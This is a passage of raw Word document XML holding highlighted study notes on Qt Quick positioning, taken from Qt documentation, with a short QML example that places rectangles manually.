        <w:t>31</w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E850B4" w:rsidRPr="00E850B4" w:rsidRDefault="00E850B4" w:rsidP="00E850B4">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850B4">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    focus</w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E850B4" w:rsidRPr="00E850B4" w:rsidRDefault="00E850B4" w:rsidP="00E850B4">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B54AE2" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2291" w:history="1">
        <w:r w:rsidR="00C50BB7" w:rsidRPr="00666090">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-positioning-topic.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C50BB7" w:rsidRPr="00C50BB7" w:rsidRDefault="00C50BB7" w:rsidP="00700D31">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1931" w:name="_Toc483000948"/>
      <w:bookmarkStart w:id="1932" w:name="_Toc483003939"/>
      <w:bookmarkStart w:id="1933" w:name="_Toc483604291"/>
      <w:bookmarkStart w:id="1934" w:name="_Toc483605511"/>
      <w:r w:rsidRPr="00700D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Important Concepts In Qt Quick - Positioning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1931"/>
      <w:bookmarkEnd w:id="1932"/>
      <w:bookmarkEnd w:id="1933"/>
      <w:bookmarkEnd w:id="1934"/>
    </w:p>
    <w:p w:rsidR="00C50BB7" w:rsidRPr="00C50BB7" w:rsidRDefault="00C50BB7" w:rsidP="00C50BB7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Visual items</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in QML can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>positioned in a variety of ways</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>most important</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> positioning-related concept is that of </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>anchoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, a form of relative positioning where items can be anchored (or attached) to each other at certain boundaries. Other positioning concepts include </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>absolute positioning</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, positioning </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with coordinate bindings</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>positioners</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>layouts</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C50BB7" w:rsidRPr="00C50BB7" w:rsidRDefault="00C50BB7" w:rsidP="00700D31">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1935" w:name="_Toc483000949"/>
      <w:bookmarkStart w:id="1936" w:name="_Toc483003940"/>
      <w:bookmarkStart w:id="1937" w:name="_Toc483604292"/>
      <w:bookmarkStart w:id="1938" w:name="_Toc483605512"/>
      <w:r w:rsidRPr="00700D31">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Manual Positioning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1935"/>
      <w:bookmarkEnd w:id="1936"/>
      <w:bookmarkEnd w:id="1937"/>
      <w:bookmarkEnd w:id="1938"/>
    </w:p>
    <w:p w:rsidR="00C50BB7" w:rsidRPr="00C50BB7" w:rsidRDefault="00C50BB7" w:rsidP="00C50BB7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Items can be positioned manually. If the user-interface is going to be </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, manual positioning provides the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>most efficient</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> form of positioning.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C50BB7" w:rsidRPr="00C50BB7" w:rsidRDefault="00C50BB7" w:rsidP="00C50BB7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In any user-interface, the visual types exist at a particular location in the screen coordinates at any instant in time. While </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fluidly animated and dynamic user-interfaces are a major focus of Qt Quick</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>statically-positioned</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> user interfaces are still a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>viable</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> option. What's more, if the position of those types does not change, it </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can often be more performant to specify the position manually</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> than to use the more dynamic positioning methods documented in proceeding sections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C50BB7" w:rsidRPr="00C50BB7" w:rsidRDefault="00C50BB7" w:rsidP="00C50BB7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>every</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> visual object is positioned within the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2292" w:history="1">
        <w:r w:rsidRPr="00C50BB7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>coordinate system</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">provided by the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick visual canvas</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. As described in that document, the x and y coordinates of a visual object are </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>relative to those of its visual parent</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>top-left corner</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> having the coordinate (0, 0).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C50BB7" w:rsidRPr="00C50BB7" w:rsidRDefault="00C50BB7" w:rsidP="00C50BB7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thus, the following example will display two rectangles positioned manually:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9513"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411"/>
        <w:gridCol w:w="5102"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C50BB7" w:rsidRPr="00C50BB7" w:rsidTr="00700D31">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4411"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50BB7" w:rsidRPr="00700D31" w:rsidRDefault="00C50BB7">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:spacing w:before="180" w:after="37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lastRenderedPageBreak/>
              <w:t>import QtQuick 2.0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C50BB7" w:rsidRPr="00700D31" w:rsidRDefault="00C50BB7">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:spacing w:before="180" w:after="375"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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Style w:val="type"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Item</w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> {</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r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="name"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>width</w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="number"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>200</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r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="name"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>height</w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="number"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>200</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r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="type"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Rectangle</w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> {</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r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="name"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="number"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>50</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r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="name"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>y</w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="number"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>50</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r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="name"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>width</w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="number"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>100</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r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="name"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
